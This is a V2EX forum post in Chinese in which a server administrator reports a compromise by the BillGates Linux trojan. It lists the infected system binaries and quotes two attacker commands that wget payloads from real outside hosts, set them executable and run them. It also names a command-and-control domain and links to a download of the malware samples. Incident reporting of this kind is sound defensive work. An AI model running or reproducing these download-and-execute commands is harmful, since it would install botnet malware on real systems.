今天下午收到腾讯云安全通知,通知服务器被入侵了,然后去腾讯云看了一下,的确被日了。
系统的 5 个文件全被一个名叫:Elf32.Trojan.BillGates.da
的病毒感染了,分别是:
/usr/bin/ps
/usr/bin/lsof
/usr/bin/netstat
/usr/bin/bsd-port/getty
/usr/bin/.sshd
接着发现在 root 目录被下载了 3 个文件:20000 、conf.n 、Kabot,查了一下执行命令:
/bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
/bin/sh -c id;wget http://117.24.13.169:881/KaBot;chmod 777 KaBot;./KaBot
接着发现,这个木马向 www.id666.pw 这个地址发送请求,请求了 14 次。
想了一下是什么原因被入侵的,服务器没有发现被暴力破解,那屌毛也没有登陆服务器,提权也没发现,因为安全组入站只开放了 3000 这一个端口,出站没有限制任何流量。服务器上运行了 YApi 的程序,就是这个程序使用的 3000 端口,几乎可以排除是从 YApi Web 入侵的,因为 Web 只允许指定地区访问并且就只有两个城市加入了白名单,平时也是公司的人用,没有对外开放过。
截至被入侵前,服务器还有两个漏洞没处理,分别是:
所以也不能排除可能是因为这两个漏洞被日的,我把被感染的程序、病毒样本和木马文件打包了一下,有能力的大佬可以分析一下。
下载地址: https://ws28.cn/f/5tdnbv41qsg (只有 24 小时有效期)
因为服务器只有 YApi 一个程序和一个数据库,数据库有备份,YApi 可以重新下载。所以收到报警就直接重装了,不给这屌毛一丁点机会。
最后想问下大家平时都是怎么做安全的?这玩意防不胜防啊我丢!
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.